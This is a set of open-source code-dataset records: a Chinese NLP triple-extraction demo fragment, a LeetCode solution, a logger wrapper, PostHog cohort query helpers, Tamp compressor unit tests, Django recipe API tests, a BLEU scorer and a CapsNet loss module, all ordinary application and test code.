NLP()\n    num = 1 # Number of triples\n\n\n    with open(input_path, 'r', encoding='utf-8') as f_in:\n        # divide sentences\n        origin_sentences = re.split('[。?!;]|\\n', f_in.read())\n    \n    for origin_sentence in origin_sentences:\n        # delete sentences less than 6 in length\n        if (len(origin_sentence) < 6):\n            continue\n        #print('*****')\n        # print(origin_sentence)\n        # segment\n        lemmas = nlp.segment(origin_sentence)\n        # POS Tagging\n        words_postag = nlp.postag(lemmas)\n        # Named Entity Recognition\n        words_netag = nlp.netag(words_postag)\n        # dependency parsing\n        sentence = nlp.parse(words_netag)\n        # print(sentence.to_string())\n\t\t\t\n\t\t\t# start extracting entities and relations\n        extractor = Extractor()\n        num = extractor.extract(origin_sentence, sentence, output_path,output_path2, num)\n","repo_name":"devWangBin/nlp-test","sub_path":"ERE/extract_demo.py","file_name":"extract_demo.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19096615252","text":"class Solution:\n    def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n        result=[0]*len(nums)\n        res=0\n        for i in range(2,len(nums)):\n            if nums[i]-nums[i-1]==nums[i-1]-nums[i-2]:\n                result[i]=1+result[i-1]\n                res+=result[i]\n        return res\n        \n        \n    ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"0413-arithmetic-slices/0413-arithmetic-slices.py","file_name":"0413-arithmetic-slices.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72452935209","text":"new_list = [1,2,3]\nresult = new_list[1]\n\nif 1 in new_list:\n    print(True)\n\nfor n in new_list:\n    if n ==1:\n        print(True)\n\n# arr.insert() is O(n) since each value needs to be moved an index\n# arr.append() is O(1) since it's added to the end of array\n# arr.delete() is O(n) since it needs to move all the indexes over\n\n# append is O(1) because of how Python implements it","repo_name":"Alejandro-Jaime-Pozas/algos_DS","sub_path":"arrays.py","file_name":"arrays.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1651777058","text":"\"\"\"\nSimple wrapper around a logger.\n\"\"\"\n\nfrom logging import Logger\n\nfrom common_utils import 
text_tools\n\n\nclass HudLogger(object):\n \"\"\"\n Wrapper around a normal logger so stuff gets printed too.\n \"\"\"\n\n def get_logger(\n self\n ) -> Logger:\n return self.__logger__\n\n def log_info_message(\n self,\n message_to_log: str,\n print_to_screen: bool = True\n ):\n \"\"\" Log and print at Info level \"\"\"\n if print_to_screen:\n print(\"LOG:\" + text_tools.escape(message_to_log))\n self.__logger__.info(text_tools.escape(message_to_log))\n\n return message_to_log\n\n def log_warning_message(\n self,\n message_to_log: str\n ):\n \"\"\" Log and print at Warning level \"\"\"\n print(\"WARN:\" + message_to_log)\n self.__logger__.warning(text_tools.escape(message_to_log))\n\n return message_to_log\n\n def __init__(\n self,\n logger: Logger\n ):\n self.__logger__ = logger\n","repo_name":"JohnMarzulli/StratuxHud","sub_path":"common_utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"53"} +{"seq_id":"39510882719","text":"from typing import List\n\nfrom posthog.hogql import ast\nfrom posthog.hogql.context import HogQLContext\nfrom posthog.hogql.errors import HogQLException\nfrom posthog.hogql.escape_sql import escape_clickhouse_string\nfrom posthog.hogql.parser import parse_expr\n\n\ndef cohort_subquery(cohort_id, is_static) -> ast.Expr:\n if is_static:\n sql = \"(SELECT person_id FROM static_cohort_people WHERE cohort_id = {cohort_id})\"\n else:\n sql = \"(SELECT person_id FROM raw_cohort_people WHERE cohort_id = {cohort_id} GROUP BY person_id, cohort_id, version HAVING sum(sign) > 0)\"\n return parse_expr(sql, {\"cohort_id\": ast.Constant(value=cohort_id)}, start=None) # clear the source start position\n\n\ndef cohort_query_node(node: ast.Expr, context: HogQLContext) -> ast.Expr:\n return cohort(node, [node], context)\n\n\ndef cohort(node: ast.Expr, args: List[ast.Expr], context: HogQLContext) -> ast.Expr:\n arg = args[0]\n if not isinstance(arg, ast.Constant):\n raise HogQLException(\"cohort() takes only constant arguments\", node=arg)\n\n from posthog.models import Cohort\n\n if isinstance(arg.value, int) and not isinstance(arg.value, bool):\n cohorts = Cohort.objects.filter(id=arg.value, team_id=context.team_id).values_list(\"id\", \"is_static\", \"name\")\n if len(cohorts) == 1:\n context.add_notice(\n start=arg.start,\n end=arg.end,\n message=f\"Cohort #{cohorts[0][0]} can also be specified as {escape_clickhouse_string(cohorts[0][2])}\",\n fix=escape_clickhouse_string(cohorts[0][2]),\n )\n return cohort_subquery(cohorts[0][0], cohorts[0][1])\n raise HogQLException(f\"Could not find cohort with id {arg.value}\", node=arg)\n\n if isinstance(arg.value, str):\n cohorts = Cohort.objects.filter(name=arg.value, team_id=context.team_id).values_list(\"id\", \"is_static\")\n if len(cohorts) == 1:\n context.add_notice(\n start=arg.start,\n end=arg.end,\n message=f\"Searching for cohort by name. 
Replace with numeric ID {cohorts[0][0]} to protect against renaming.\",\n fix=str(cohorts[0][0]),\n )\n return cohort_subquery(cohorts[0][0], cohorts[0][1])\n elif len(cohorts) > 1:\n raise HogQLException(f\"Found multiple cohorts with name '{arg.value}'\", node=arg)\n raise HogQLException(f\"Could not find a cohort with the name '{arg.value}'\", node=arg)\n\n raise HogQLException(\"cohort() takes exactly one string or integer argument\", node=arg)\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/functions/cohort.py","file_name":"cohort.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"36894500016","text":"\"\"\"Tamp compressor tests.\n\nOur custom huffman size table:\n\n huffman_coding = {\n 2: 0b0,\n 3: 0b11,\n 4: 0b1000,\n 5: 0b1011,\n 6: 0b10100,\n 7: 0b100100,\n 8: 0b100110,\n 9: 0b101011,\n 10: 0b1001011,\n 11: 0b1010100,\n 12: 0b10010100,\n 13: 0b10010101,\n 14: 0b10101010,\n 15: 0b100111,\n \"FLUSH\": 0b10101011,\n }\n\"\"\"\n\nimport io\nimport unittest\n\nfrom tamp import ExcessBitsError\n\ntry:\n import micropython\nexcept ImportError:\n micropython = None\n\n\nCompressors = []\ncompresses = []\n\nif micropython:\n from tamp.compressor_viper import Compressor as ViperCompressor\n from tamp.compressor_viper import compress as viper_compress\n\n Compressors.append(ViperCompressor)\n compresses.append(viper_compress)\nelse:\n from tamp.compressor import Compressor as PyCompressor\n from tamp.compressor import compress as py_compress\n\n Compressors.append(PyCompressor)\n compresses.append(py_compress)\n\n try:\n from tamp._c_compressor import Compressor as CCompressor\n from tamp._c_compressor import compress as c_compress\n\n Compressors.append(CCompressor)\n compresses.append(c_compress)\n except ImportError:\n pass\n\n\nclass TestCompressor(unittest.TestCase):\n def test_compressor_default(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string = b\"foo foo foo\"\n\n expected = bytes(\n # fmt: off\n [\n 0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n 0b1_0110011, # literal \"f\"\n 0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b00011_1_00, # literal \" \"\n 0b100000_0_1, # There is now \"foo \" at index 0\n 0b000_00000, # size=4 -> 0b1000\n 0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b00000000, # index 0 -> 0b0000000000\n 0b00_000000, # 6 bits of zero-padding\n ]\n # fmt: on\n )\n\n bytes_written = 0\n with io.BytesIO() as f:\n compressor = Compressor(f)\n bytes_written += compressor.write(test_string)\n bytes_written += compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n compressor.close()\n self.assertEqual(actual, expected)\n self.assertEqual(bytes_written, len(expected))\n\n # Test Context Manager\n bytes_written = 0\n with io.BytesIO() as f, Compressor(f) as compressor:\n bytes_written += compressor.write(test_string)\n bytes_written += compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n self.assertEqual(bytes_written, len(expected))\n\n def test_compressor_input_buffer(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n expected = bytes(\n # fmt: off\n [\n 0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n 0b1_0110011, # literal \"f\"\n 0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n # 
size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b00011_1_00, # literal \" \"\n 0b100000_0_1, # There is now \"foo \" at index 0\n 0b000_00000, # size=4 -> 0b1000\n 0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b00000000, # index 0 -> 0b0000000000\n 0b00_000000, # 6 bits of zero-padding\n ]\n # fmt: on\n )\n\n with io.BytesIO() as f:\n compressor = Compressor(f)\n compressor.write(b\"f\")\n compressor.write(b\"oo\")\n compressor.write(b\" fo\")\n compressor.write(b\"o foo\")\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n\n def test_compressor_7bit(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string = b\"foo foo foo\"\n\n expected = bytes(\n # fmt: off\n [\n 0b010_10_0_0_0, # header (window_bits=10, literal_bits=7)\n 0b1_1100110, # literal \"f\"\n 0b0_0_001000, # the pre-init buffer contains \"oo \" at index 131\n # size=2 -> 0b0\n # 131 -> 0b0010000011\n 0b0011_1_010, # literal \" \"\n 0b0000_0_100, # size=4 -> 0b1000\n 0b0_0000000,\n 0b000_0_11_00, # Just \"foo\" at index 0; size=3 -> 0b11\n 0b000000000, # index 0 -> 0b0000000000\n # no padding!\n ]\n # fmt: on\n )\n with io.BytesIO() as f:\n compressor = Compressor(f, literal=7)\n compressor.write(test_string)\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n\n def test_compressor_predefined_dictionary(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string = b\"foo foo foo\"\n\n init_string = b\"foo foo foo\"\n dictionary = bytearray(1 << 8)\n dictionary[: len(init_string)] = init_string\n\n expected = bytes(\n # fmt: off\n [\n 0b000_10_1_0_0, # header (window_bits=8, literal_bits=7, dictionary provided)\n 0b0_1010100, # match-size 11\n 0b00000000, # At index 0\n # no padding!\n ]\n # fmt: on\n )\n\n with io.BytesIO() as f:\n compressor = Compressor(f, window=8, literal=7, dictionary=dictionary)\n compressor.write(test_string)\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n self.assertEqual(actual, expected)\n\n def test_compressor_predefined_dictionary_incorrect_size(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n dictionary = bytearray(1 << 8)\n with io.BytesIO() as f, self.assertRaises(ValueError):\n Compressor(f, window=9, literal=7, dictionary=dictionary)\n\n def test_oob_2_byte_pattern(self):\n \"\"\"Viper implementation had a bug where a pattern of length 2 could be detected at the end of a string (going out of bounds by 1 byte).\"\"\"\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor):\n test_string_extended = bytearray(b\"Q\\x00Q\\x00\")\n test_string = memoryview(test_string_extended)[:3] # b\"Q\\x00Q\"\n\n with io.BytesIO() as f:\n compressor = Compressor(f)\n compressor.write(test_string)\n compressor.flush(write_token=False)\n\n f.seek(0)\n actual = f.read()\n\n # Q == 0b0101_0001\n expected = bytes(\n [\n 0b010_11_00_0,\n 0b1_0101_000,\n 0b1_1_0000_00,\n 0b00_1_0101_0,\n 0b001_00000,\n ]\n )\n assert actual == expected\n\n def test_excess_bits(self):\n for Compressor in Compressors:\n with self.subTest(Compressor=Compressor), io.BytesIO() as f:\n compressor = Compressor(f, literal=7)\n\n with self.assertRaises(ExcessBitsError):\n compressor.write(b\"\\xFF\")\n compressor.flush()\n\n def test_single_shot_compress_text(self):\n for compress in compresses:\n with self.subTest(compress=compress):\n expected = bytes(\n # fmt: 
off\n                    [\n                        0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n                        0b1_0110011, # literal \"f\"\n                        0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n                        # size=2 -> 0b0\n                        # 131 -> 0b0010000011\n                        0b00011_1_00, # literal \" \"\n                        0b100000_0_1, # There is now \"foo \" at index 0\n                        0b000_00000, # size=4 -> 0b1000\n                        0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n                        0b00000000, # index 0 -> 0b0000000000\n                        0b00_000000, # 6 bits of zero-padding\n                    ]\n                    # fmt: on\n                )\n                self.assertEqual(compress(\"foo foo foo\"), expected)\n\n    def test_single_shot_compress_binary(self):\n        for compress in compresses:\n            with self.subTest(compress=compress):\n                expected = bytes(\n                    # fmt: off\n                    [\n                        0b010_11_0_0_0, # header (window_bits=10, literal_bits=8)\n                        0b1_0110011, # literal \"f\"\n                        0b0_0_0_00100, # the pre-init buffer contains \"oo\" at index 131\n                        # size=2 -> 0b0\n                        # 131 -> 0b0010000011\n                        0b00011_1_00, # literal \" \"\n                        0b100000_0_1, # There is now \"foo \" at index 0\n                        0b000_00000, # size=4 -> 0b1000\n                        0b00000_0_11, # Just \"foo\" at index 0; size=3 -> 0b11\n                        0b00000000, # index 0 -> 0b0000000000\n                        0b00_000000, # 6 bits of zero-padding\n                    ]\n                    # fmt: on\n                )\n                self.assertEqual(compress(b\"foo foo foo\"), expected)\n\n    def test_invalid_conf(self):\n        for Compressor in Compressors:\n            with self.subTest(Compressor=Compressor), io.BytesIO() as f:\n                with self.assertRaises(ValueError):\n                    Compressor(f, literal=4)\n                with self.assertRaises(ValueError):\n                    Compressor(f, window=16)\n","repo_name":"BrianPugh/tamp","sub_path":"tests/test_compressor.py","file_name":"test_compressor.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"72449597609","text":"\"\"\"BLEU SCORE\n\n@author: vasudevgupta\n\"\"\"\nimport nltk\nimport numpy as np\nimport pandas as pd\n\n\nclass Bleu:\n\n    def __init__(self, N=4):\n        \"\"\"GET THE BLEU SCORE\n        INPUT THE TARGET AND PREDICTION\n        \"\"\"\n        self.N = N\n\n    def get_score(self, target, pred):\n\n        ngrams_prec = []\n        for n in range(1, self.N+1):\n            precision = self.get_Ngram_precision(target, pred, n)\n            ngrams_prec.append(precision)\n\n        len_target = np.mean([len(targ) for targ in target]) if type(\n            target[0]) == list else len(target)\n\n        len_penalty = 1 if len(pred) >= len_target else np.exp(\n            1 - len_target/len(pred))\n\n        self.bleu_scr = len_penalty*(np.prod(ngrams_prec)**(1/self.N))\n\n        return self.bleu_scr\n\n    def get_Ngram_precision(self, target, pred, n):\n\n        new_pred = list(nltk.ngrams(pred, n))\n        count_pred = self._counter(new_pred)\n\n        # if there are multiple reference sentences\n        if type(target[0]) == list:\n\n            new_target = [list(nltk.ngrams(target[i], n))\n                          for i in range(len(target))]\n            count_target = [self._counter(new_target[i])\n                            for i in range(len(new_target))]\n\n            scores = [[np.min([count_pred[tok], count_target[i][tok]])\n                       if tok in new_target[i] else 0\n                       for tok in count_pred.keys()]\n                      for i in range(len(new_target))]\n\n            final_score = np.max(scores, axis=0)\n\n        else:\n\n            new_target = list(nltk.ngrams(target, n))\n            count_target = self._counter(new_target)\n\n            final_score = [np.min([count_pred[tok], count_target[tok]])\n                           if tok in new_target else 0 for tok in count_pred.keys()]\n\n        # just for ensuring that no errors happen\n        len_pred = len(new_pred) if len(new_pred) > 0 else 1\n\n        precisions = np.sum(final_score)/len_pred\n\n        return precisions\n\n    def _counter(self, ls):\n        \"\"\"Returns a dict with freq of each element in ls\n        \"\"\"\n        freq = 
pd.Series(ls).value_counts()\n        return dict(freq)\n\n\n# just for verifying it's working\nif __name__ == '__main__':\n    target = ' cat is walking in the garden'.split()\n    pred = 'the cat is walking in the garden'.split()\n    bl = Bleu(N=4)\n    print(bl.get_score(target, pred))\n","repo_name":"thevasudevgupta/tf-lightning","sub_path":"tf_lightning/experimental/bleu.py","file_name":"bleu.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16463226343","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestKlayGetBlockWithConsensusInfoByNumber(KlaytnBaseTesting):\n\n    def setUp(self) -> None:\n        super().setUp()\n        self.blockTag = \"0x6e0431\"\n\n    def test_post(self):\n        self.response = self.w3.klay.get_block_with_consensus_info_by_number(\n            self.blockTag\n        )\n        self.assertRegex(self.response[\"hash\"], r'^0x.*$')\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/klay/block/test_get_block_with_consensus_info_by_number.py","file_name":"test_get_block_with_consensus_info_by_number.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"32000760453","text":"import tempfile\nimport os\n\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom PIL import Image\n\nfrom core.models import Recipe, Ingredient, Tag\nfrom recipe.serializers import RecipeSerializer, RecipeDetailSerializer\n\nRECIPES_URL = reverse('recipe:recipe-list')\n\n\ndef get_recipe_detail_url(pk: int):\n    return reverse('recipe:recipe-detail', args=[pk])\n\n\ndef get_image_upload_url(pk: int):\n    return reverse('recipe:recipe-upload-image', args=[pk])\n\n\nclass PublicRecipesApiTest(TestCase):\n    def setUp(self):\n        self.client = APIClient()\n\n    def test_login_required(self):\n        \"\"\"Test that login is required for retrieving recipes.\"\"\"\n        res = self.client.get(RECIPES_URL)\n\n        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateRecipesApiTest(TestCase):\n    def setUp(self):\n        self.client = APIClient()\n        self.user = get_user_model().objects.create_user(\n            'test@gmail.com',\n            'password123',\n        )\n        self.client.force_authenticate(self.user)\n\n    def _create_recipe(self, **params):\n        return Recipe.objects.create(**params)\n\n    def test_retrieve_recipes(self):\n        \"\"\"Test retrieving recipes.\"\"\"\n        recipe_1 = self._create_recipe(\n            title='Recipe 1', user=self.user, time_minutes=5, price=10.00\n        )\n        recipe_1.ingredients.add(\n            Ingredient.objects.create(name='cucumber', user=self.user),\n            Ingredient.objects.create(name='tomato', user=self.user),\n        )\n        recipe_1.tags.add(\n            Tag.objects.create(name='tag1', user=self.user),\n            Tag.objects.create(name='tag2', user=self.user),\n        )\n        self._create_recipe(\n            title='Recipe 2', user=self.user, time_minutes=3, price=12.50\n        )\n        expected_recipes = RecipeSerializer(\n            Recipe.objects.all().order_by('-id'), many=True\n        )\n\n        res = self.client.get(RECIPES_URL)\n\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(res.data, expected_recipes.data)\n\n    def test_recipes_limited_to_user(self):\n        \"\"\"Test retrieving only the user's recipes.\"\"\"\n        self._create_recipe(\n            title='Recipe 1', user=self.user, time_minutes=6, price=4.00\n        )\n        other_user = get_user_model().objects.create_user(\n            
'other@gmail.com', 'password123'\n        )\n        self._create_recipe(\n            title='Recipe 2', user=other_user, time_minutes=1, price=4.00\n        )\n        expected_recipes = RecipeSerializer(\n            Recipe.objects.filter(user=self.user), many=True\n        )\n\n        res = self.client.get(RECIPES_URL)\n\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(res.data, expected_recipes.data)\n\n    def test_recipe_detail(self):\n        \"\"\"Test retrieving recipe detail data.\"\"\"\n        recipe = Recipe.objects.create(\n            title='Recipe 1', user=self.user, time_minutes=6, price=4.00\n        )\n        tag = Tag.objects.create(user=self.user, name='Tag 1')\n        ingredient = Ingredient.objects.create(user=self.user, name='Ingredient 1')\n        recipe.tags.add(tag)\n        recipe.ingredients.add(ingredient)\n        serializer = RecipeDetailSerializer(recipe)\n\n        url = get_recipe_detail_url(recipe.id)\n        res = self.client.get(url)\n\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(res.data, serializer.data)\n        self.assertEqual(res.data['tags'][0]['name'], tag.name)\n        self.assertEqual(res.data['ingredients'][0]['name'], ingredient.name)\n\n    def test_recipe_detail_of_other_user(self):\n        \"\"\"Make sure a user can only retrieve his own recipe detail views.\"\"\"\n        other_user = get_user_model().objects.create_user(\n            'other@gmail.com', 'password123'\n        )\n        recipe = Recipe.objects.create(\n            title='Recipe 1', user=other_user, time_minutes=6, price=4.00\n        )\n\n        url = get_recipe_detail_url(recipe.id)\n        res = self.client.get(url)\n\n        self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_recipe_create_success(self):\n        \"\"\"Test creating a new recipe.\"\"\"\n        payload = {'title': 'New Recipe', 'time_minutes': 5, 'price': 3.33}\n\n        res = self.client.post(RECIPES_URL, payload)\n\n        self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n        self.assertTrue(Recipe.objects.filter(title=payload['title']).exists())\n\n    def test_recipe_with_tags_create_success(self):\n        \"\"\"Test creating a new recipe with tags.\"\"\"\n        tag_1 = Tag.objects.create(user=self.user, name='tag 1')\n        tag_2 = Tag.objects.create(user=self.user, name='tag 2')\n        payload = {\n            'title': 'New Recipe',\n            'time_minutes': 5,\n            'price': 3.33,\n            'tags': [tag_1.id, tag_2.id],\n        }\n\n        res = self.client.post(RECIPES_URL, payload)\n\n        self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n        recipe = Recipe.objects.get(title=payload['title'])\n        tags = recipe.tags.all()\n        self.assertIn(tag_1, tags)\n        self.assertIn(tag_2, tags)\n\n    def test_recipe_with_ingredients_create_success(self):\n        \"\"\"Test creating a new recipe with ingredients.\"\"\"\n        ingredient_1 = Ingredient.objects.create(user=self.user, name='Ingredient 1')\n        ingredient_2 = Ingredient.objects.create(user=self.user, name='Ingredient 2')\n        payload = {\n            'title': 'New Recipe',\n            'time_minutes': 5,\n            'price': 3.33,\n            'ingredients': [ingredient_1.id, ingredient_2.id],\n        }\n\n        res = self.client.post(RECIPES_URL, payload)\n\n        self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n        recipe = Recipe.objects.get(title=payload['title'])\n        ingredients = recipe.ingredients.all()\n        self.assertIn(ingredient_1, ingredients)\n        self.assertIn(ingredient_2, ingredients)\n\n    def test_partial_update_recipe(self):\n        \"\"\"Test HTTP PATCH is possible on existing recipe objects.\"\"\"\n        recipe = Recipe.objects.create(\n            user=self.user, title='Chickenn', time_minutes=5, price=10.00\n        )\n        tag = Tag.objects.create(user=self.user, name='Tag')\n        payload = {\n            'title': 'Chicken with vegetables',\n            'tags': [tag.id],\n        }\n\n        url = 
get_recipe_detail_url(recipe.id)\n        res = self.client.patch(url, payload)\n\n        recipe.refresh_from_db()\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertIn(tag, recipe.tags.all())\n        self.assertEqual(recipe.title, payload['title'])\n\n    def test_full_update_recipe(self):\n        \"\"\"Test HTTP PUT is possible on existing recipe objects.\"\"\"\n        recipe = Recipe.objects.create(\n            user=self.user, title='Chickenn', time_minutes=5, price=10.00\n        )\n        tag = Tag.objects.create(user=self.user, name='Tag')\n        recipe.tags.add(tag)\n        payload = {\n            'title': 'Chicken with vegetables',\n            'time_minutes': 1,\n            'price': 69.00,\n        }\n\n        url = get_recipe_detail_url(recipe.id)\n        res = self.client.put(url, payload)\n\n        recipe.refresh_from_db()\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertNotIn(tag, recipe.tags.all())\n        self.assertEqual(recipe.title, payload['title'])\n\n\nclass RecipeImageUploadTests(TestCase):\n    def setUp(self):\n        self.client = APIClient()\n        self.user = get_user_model().objects.create_user(\n            'test@gmail.com',\n            'testpass',\n        )\n        self.client.force_authenticate(self.user)\n        self.recipe = Recipe.objects.create(\n            user=self.user, title='Sample', time_minutes=1, price=1.0\n        )\n\n    def test_upload_image_to_recipe(self):\n        \"\"\"Test uploading an image to a recipe.\"\"\"\n        url = get_image_upload_url(self.recipe.id)\n        with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:\n            img = Image.new('RGB', (10, 10))\n            img.save(ntf, format='JPEG')\n            ntf.seek(0)\n            res = self.client.post(url, {'image': ntf}, format='multipart')\n\n        self.recipe.refresh_from_db()\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertIn('image', res.data)\n        self.assertTrue(os.path.exists(self.recipe.image.path))\n\n    def test_upload_image_bad_request(self):\n        \"\"\"Test uploading an invalid image.\"\"\"\n        url = get_image_upload_url(self.recipe.id)\n\n        res = self.client.post(url, {'image': 'notimage'}, format='multipart')\n\n        self.recipe.refresh_from_db()\n        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n        self.assertFalse(self.recipe.image)\n\n    def test_filter_tags_success(self):\n        \"\"\"Test filtering recipes by tags.\"\"\"\n        recipe_1 = Recipe.objects.create(\n            user=self.user, title='Dish 1', time_minutes=1, price=1.11\n        )\n        recipe_2 = Recipe.objects.create(\n            user=self.user, title='Dish 2', time_minutes=2, price=2.22\n        )\n        recipe_3 = Recipe.objects.create(\n            user=self.user, title='Dish 3', time_minutes=3, price=3.33\n        )\n        tag_1 = Tag.objects.create(user=self.user, name='Tag 1')\n        tag_2 = Tag.objects.create(user=self.user, name='Tag 2')\n        recipe_1.tags.add(tag_1)\n        recipe_2.tags.add(tag_2)\n\n        res = self.client.get(RECIPES_URL, {'tags': f'{tag_1.id},{tag_2.id}'})\n\n        self.assertIn(RecipeSerializer(recipe_1).data, res.data)\n        self.assertIn(RecipeSerializer(recipe_2).data, res.data)\n        self.assertNotIn(RecipeSerializer(recipe_3).data, res.data)\n\n    def test_filter_ingredients_success(self):\n        \"\"\"Test filtering recipes by ingredients.\"\"\"\n        recipe_1 = Recipe.objects.create(\n            user=self.user, title='Dish 1', time_minutes=1, price=1.11\n        )\n        recipe_2 = Recipe.objects.create(\n            user=self.user, title='Dish 2', time_minutes=2, price=2.22\n        )\n        recipe_3 = Recipe.objects.create(\n            user=self.user, title='Dish 3', time_minutes=3, price=3.33\n        )\n        ingredient_1 = Ingredient.objects.create(user=self.user, name='ingredient 1')\n        ingredient_2 = Ingredient.objects.create(user=self.user, name='ingredient 2')\n        recipe_1.ingredients.add(ingredient_1)\n        recipe_2.ingredients.add(ingredient_2)\n\n        
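# Request recipes filtered by a comma-separated list of ingredient ids.\n        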
res = self.client.get(\n            RECIPES_URL, {'ingredients': f'{ingredient_1.id},{ingredient_2.id}'}\n        )\n\n        self.assertIn(RecipeSerializer(recipe_1).data, res.data)\n        self.assertIn(RecipeSerializer(recipe_2).data, res.data)\n        self.assertNotIn(RecipeSerializer(recipe_3).data, res.data)\n\n    def tearDown(self):\n        self.recipe.image.delete()\n","repo_name":"mkwiatek770/REST-API-Advanced","sub_path":"app/recipe/tests/test_recipe_api.py","file_name":"test_recipe_api.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32383913392","text":"# import jax.numpy as jnp\nimport logging\nimport numpy as np\nimport enseisro.misc_functions as FN\nfrom enseisro import globalvars\n\nLOGGER = logging.getLogger(__name__)\n\ndef get_eig(GVAR, mode_idx):\n    try:\n        U = np.loadtxt(f'{GVAR.eigdir}/' +\n                       f'U{mode_idx}.dat')[GVAR.rmin_idx:GVAR.rmax_idx]\n        V = np.loadtxt(f'{GVAR.eigdir}/' +\n                       f'V{mode_idx}.dat')[GVAR.rmin_idx:GVAR.rmax_idx]\n    except FileNotFoundError:\n        LOGGER.info('Mode file not found for mode index = {}'\\\n            .format(mode_idx))\n        return None\n    return U, V\n","repo_name":"srijaniiserprinceton/enseisro","sub_path":"enseisro/loading_functions.py","file_name":"loading_functions.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40575509465","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass CapsNetLoss(nn.Module):\n\n    def __init__(self, w_recon=0.0005):\n        super(CapsNetLoss, self).__init__()\n\n        self.cls_loss_func = MarginLoss()\n        self.reconstruction_loss_func = nn.MSELoss(reduction='sum')\n        self.w_recon = w_recon\n\n    def forward(self, probability, target, reconstruction=None, image=None):\n        \n        total_loss = self.cls_loss_func(probability, target)\n\n        if (reconstruction is not None) and (image is not None):\n            batch_size = image.shape[0]\n            reconstruction_loss = self.reconstruction_loss_func(reconstruction, image.reshape(batch_size, -1))\n            reconstruction_loss = reconstruction_loss / float(batch_size)\n            total_loss = total_loss + self.w_recon * reconstruction_loss\n\n        return total_loss\n\n\nclass MarginLoss(nn.Module):\n\n    def __init__(self, m_pos=0.9, m_neg=0.1, w_neg=0.5, onehot=False):\n        super(MarginLoss, self).__init__()\n\n        self.m_pos = m_pos\n        self.m_neg = m_neg\n        self.w_neg = w_neg\n        self.onehot = onehot\n\n    def forward(self, input, target):\n\n        target_onehot = target.float() if self.onehot else torch.zeros(input.shape, device=target.device).scatter_(1, target.unsqueeze(dim=1), 1)\n\n        pos_term = (self.m_pos - input).relu_() ** 2\n        neg_term = (input - self.m_neg).relu_() ** 2\n\n        loss = target_onehot * pos_term + self.w_neg * (1.0 - target_onehot) * neg_term\n        loss = loss.mean()\n\n        return 